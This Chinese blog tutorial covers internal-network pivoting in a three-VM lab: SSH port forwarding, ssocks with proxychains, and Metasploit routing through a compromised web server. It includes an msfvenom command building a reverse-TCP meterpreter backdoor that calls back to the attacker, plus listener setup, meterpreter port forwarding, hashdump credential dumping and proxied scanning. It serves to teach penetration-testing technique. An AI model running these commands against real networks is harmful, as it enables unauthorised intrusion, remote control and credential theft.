文章目录

  • 环境搭建
  • SSH隧道
    • 正向连接
    • 反向隧道
    • sockets代理
  • MSF端口映射
  • Socket隧道
    • ssocks
      • 反向代理
      • 1.建立隧道
      • 2.开启代理
      • 正向代理
      • 扫描内网
  • MSF跨路由扫描
      • 简单收集信息
      • 增加路由
      • MSF其他模块
    • 推荐阅读

环境搭建

分别是三个虚拟机(我这里用的两个ubuntu,一个kali)

因为web服务器有两个ip所以需要添加一个网卡,然后设置LAN区段

注:一开始lan区段是空的,手动添加一个就行

数据库服务器同样将网卡模式设置为LAN网段

分别进入web服务器虚拟机和数据库服务器虚拟机,将IPV4设置为手动

手动设置IP地址,子网掩码,网关为LAN网段,设置完毕后,ifconfig查看,如果没有改变,手动断开网络连接重连

ifconfig效果:

web服务器:

数据库服务器:

kali:


注:之后的实验均采用此拓扑结构(IP稍有不同)
所有图中正确的网关为:192.168.179.2

SSH隧道

这是整个网络的拓扑(web服务器已经被拿下),分析下可以得知

  • 内网WEB服务器有公私网双IP
  • 攻击者和web服务器处于同一网络(192),可以联通,攻击者(192段)和数据库服务器不可以联通(10段)
  • web服务器和数据库服务器可以联通(10段)

所以现在的目的就是通过web服务器建立隧道,使攻击者可以联通数据库服务器

正向连接

远程侦听端口,访问转发到本机主机指定端口。在web服务器上执行ssh命令

ssh –CNfL 0.0.0.0:7777:10.10.10.128:80 web@127.0.0.1
# 命令解析:
ssh –CNfL <listen ip> <listen posrt> :<remote ip>:<remote port> WebServerUser(跳板机用户)@<ssh server> -p <ssh server port>
-C 压缩传输
-f 将SSH传输转入后台执行
-N 建立静默连接
-g 允许远程主机连接本地用于转发的端口
-L 本地端口转发

运行命令,输入跳板机的ssh登陆密码,就可以了

映射成功后,攻击者使用浏览器访问web服务器(192.168.0.144)的7777端口,访问结果就是数据服务器的80端口的内容

反向隧道

1.web服务器执行以下命令:
ssh –qTfnN –R 2222:127.0.0.1:22  root@192.168.0.115
# 命令解析:
ssh -qTfnN -R port:host:hostport  remoteuser@remote_ip
将本地22端口映射到攻击者的2222端口,执行之后需要输入remoteuser的密码2.攻击者执行以下命令:
(注意要开启ssh服务,开启后执行以下操作)
ssh –p 2222 web@127.0.0.1
# 命令解析:
连接端口

反向隧道类似于反弹shell,将web服务器的ssh端口映射,对于Windows服务器可以映射3389端口(RDP)

ssh -CfNg -R 11111:192.168.160.139:3389 root@192.168.160.140

kali上通过rdesktop连接本地的11111端口

rdesktop 127.0.0.1:11111

sockets代理

ssh -D '[::]:1080' JumpHost
SSH -qTfnN -D port remotehost

两种方法都没有成功

MSF端口映射

使用msf来完成正向连接和反向连接,原理都是一样的,拓扑还是之前的,不过这次web服务器是一个winserver

首先去拿shell

使用msf生成后门

msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.115  lport=12345 -f exe >/var/www/html/ss.exe

kali监听对应端口

use exploit/multi/handler
set payload  windows/meterpreter/reverse_tcp
set lhost 192.168.0.115
set lport 12345
exploit

端口映射

在winserver执行exe文件后拿到shell,在meterpreter中执行命令映射端口

portfwd add -L 192.168.0.115 -l 2020 -r 10.10.10.128 -p 80 -L localhost
-l localport
-r remote ip
-p remote port

直接将数据库服务器的80端口映射到了kali的2020端口,直接浏览器访问 http://192.168.0.115:2020 端口即可

转发端口

# meterpreter
portfwd add -l 5555 -p 3389 -r 192.168.0.144
-l localport
-r remote ip
-p remote portrdesktop 127.1.1.0:5555

其他命令

查看列表

portfwd list

清空列表

portfwd flush

Socket隧道

拓扑

ssocks

sSocks是一个socks代理工具套装,可用来开启socks代理服务

下载连接:http://sourceforge.net/projects/ssocks

web服务器和kali都需要安装这款工具才能使用

下载之后进行编译,可以选择先下载到kali编译之后上传到web服务器,也可以直接在web服务器下载编译

./configure && make

src目录中存放了编译好的文件

反向代理

将远程计算机作为socks代理服务端,反弹回本地,方便内网的渗透测试

1.建立隧道

kali端:

./rcsocks -l 1088 -p 1080 -vv-vv 获取详细信息
等待远程Socks5服务器访问本地1080端口,创建端口1080与本地端口1088的连接通道,将本地的1088端口的流量转发到1080端口

web服务器端:

./rssocks -vv -s 192.168.179.128:1080
#接收192.168.179.128:1080端口的流量

输入命令后通道就建立完毕了

2.开启代理

proxychains代理链是Linux下一款代理设置工具,kali中默认安装,ubuntu需要使用命令apt-get install proxychains安装

kali端修改配置文件:

/etc/proxychains.conf

注释socks4添加socks5(注意是socks5下图有误)

测试

proxychains ssh 127.0.0.1

输入密码连接后,成功连接ssh,查看本机ip

使用firefox

proxychains firefox 10.0.0.2

我这边是经过了多次测试才成功,可以先试一下ssh再curl,由于Ssocks不稳定,所以不建议使用

正向代理

web服务器如下命令创建代理并监听192.168.179.147(自己的IP)

./ssocksd --bind 192.168.179.147 --port 6020

在攻击主机编辑proxychains代理配置文件,添加代理配置信息:socks5 192.168.179.147 6020

vi /etc/proxychains.conf

执行如下命令,连接内网服务器,查看ip得知代理成功。

1proxychains ssh 127.0.0.1

扫描内网

用kali里边的nmap扫描

proxychains nmap -Pn -sT 10.0.0.2

MSF跨路由扫描

在Kali生成后门文件

msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.179.128  lport=12345 -f exe >/var/www/html/s.exe

生成完毕,通过webshell将文件上传至win服务器

kali进入msf,开启监听

use exploit/multi/handler
set payload  windows/meterpreter/reverse_tcp
set lhost 192.168.179.128
set lport 12345
exploit

等win服务器那边点击了exe文件,这边就上线了

简单收集信息

  • 查看当前用户

    getuid
    

  • 查看网卡信息

    ifconfig
    

  • 查看路由信息

    run get_local_subnets
    

    run autoroute -p
    

    发现没有路由,接下来使用命令添加路由

增加路由

run autoroute -s 10.0.0.0/24
run autoroute -p

这样的话就添加了一条路由,但是仅这样是不行的,还有添加代理

background 之后使用 socks4a 模块

use auxiliary/server/socks4a
set SRVPORT 10044

修改配置文件

vi /etc/prxoychains.conf

注释掉原来的,添加一条新的

socks4 192.168.179.128 10044

这样的话路由就添加完成了

可以使用nmap对10.0.0.2进行端口扫描

proxychains nmap -sT -Pn 10.0.0.2

也可以用hydra进行密码爆破

MSF其他模块

  • metasploit的主机发现模块

    use auxiliary/scanner/discover/arp_sweep

  • hash收集

    run hashdump

推荐阅读

内网渗透基石篇-- 隐藏通信隧道技术(上)

内网渗透基石篇–隐藏通信隧道技术(下)

内网渗透篇:ssocks+proxychains搭建代理

SSH隧道:内网穿透实战

内网基础-隧道技术、内网穿透(SSH隧道、Socket隧道、跨路由扫描)相关推荐

  1. 【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议

    前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...

  2. [内网基础]msf使用内网实战演示

    [内网基础]msf使用&内网实战演示 msf是一款渗透测试使用的框架,其中包含了很多工具. 官方手册地址: https://docs.metasploit.com/docs/using-met ...

  3. 内网安全:隧道技术详解

    目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一:CS反向连接上线 - 拿下Win2008 一. 使用转发代理上线创建监听器 二. 上传后 ...

  4. 内网渗透测试第一章——内网基础知识

    (一)内网基础知识 1. 内网概述 内网也指局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组.一般是方圆几千米以内.局域网可以实现文件管理.应用软件共 ...

  5. 【算力网络】算力网络的技术创新——算网一体关键技术

    本人就职于国际知名终端厂商,负责modem芯片研发. 在5G早期负责终端数据业务层.核心网相关的开发工作,目前牵头6G算力网络技术标准研究. 博客内容主要围绕:        5G协议讲解       ...

  6. 第三章 隐藏通信隧道技术

    第三章 隐藏通信隧道技术 3.1 隐藏通信隧道基础知识 3.1.1 隐藏通信隧道概述 什么是隧道? 在实际的网络中,通常会通过各种边界设备.软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异 ...

  7. DAY43(DAY44拓展):隐藏通信隧道技术的概述与使用

    DAY43(DAY44拓展):隐藏通信隧道技术的概述与使用 OSI 七层模型 物链网传会表应 常用的隧道技术: (1)网络层:IPv6隧道.ICMP隧道.GRE隧道 (2)传输层:TCP隧道.UDP隧 ...

  8. 关于×××隧道技术在使用中的优势

    关于×××隧道技术在使用中的优势 http://network.51cto.com  2009-12-28 16:55  佚名  wade  我要评论(0) ×××隧道技术已经成为越来越多企业使用的网 ...

  9. 网络基础---广域网技术

    广域网技术 数据链路层面: 针对不同的物理链路(电路)定义不同的封装 局域网封装:Ethernet 2 (0800 以太网), IEEE802.3(作用于OS模型) 广域网封装:PPP HDLC FR ...

  10. 红蓝对抗之隧道技术第一篇(内网穿透、端口映射端口转发、Netsh端口转发、CS正反向连接多层内网、Burp设置上游代理访问内网、MSF protfwd端口转发/重定向)

    文章目录 隧道应用 端口映射&端口转发 Netsh端口转发 Netsh端口转发meterpreter CS正向连接多层内网 CS反向连接多层内网 Burp设置上游代理访问内网 MSF prot ...

最新文章

  1. 厦门大学计算机科学每年的保研率是多少,厦大保研率大曝光,高达30%!研厦党该何去何从?...
  2. STC8G1K单片机软件执行时间物理测量
  3. 腾讯视频下载安装免费2020_腾讯视频app的哪里发贴
  4. Python 读取json文件
  5. java接口自动化(一) - 接口自动化测试整体认知 - 开山篇(超详解)
  6. VC中如何设置Socket的TCP/IP KeepAlive机制(MSDN)
  7. 贝叶斯概率推断:概率分布
  8. 超硬核 Web 前端学霸笔记,学完就去找工作!
  9. html怎么设置取消隐藏,怎么取消wifi隐藏_取消隐藏wifi设置方法-192路由网
  10. 笔记本CPU更换硅脂、液金散热对比测试
  11. 你选择了你的记忆,和生活。
  12. 开关电源布局布线总结
  13. 常用的js代码以及自动在线生成JavaScript工具地址
  14. 房企买房送车位的涉税风险
  15. 俄罗斯钓鱼服务器位置,俄罗斯钓鱼4《RussianFishing4》钓鱼地点攻略
  16. Rhino的开发环境配置
  17. 互联网时代,政府如何应对网络舆情监测危机
  18. Mittag-Leffler定理,Weierstrass因子分解定理和插值定理
  19. 浏览器兼容平台f2etest搭建详细记录
  20. Spring Boot与Log4j2集成之java.lang.IllegalStateException: Logback configuration error detected:

热门文章

  1. SQL Server添加Northwind数据库
  2. IE首页被劫持,桌面图标异常的个人综合清理方法
  3. 网络安全系列-XI: 主流网络协议介绍
  4. 60款顶级大数据开源工具
  5. Load Runner:了解软件安装后目录http://www.boobooke.com/bbs/thread-1959-1-1.html
  6. 那个程序员的 Linux 常用软件清单 | Linux 工具篇
  7. 科技粉必看的10部电影
  8. C# 中文简体中文繁体转换_ChineseConverter
  9. 快速排序的C语言实现
  10. 天正电气插入图块非常小与比例不符合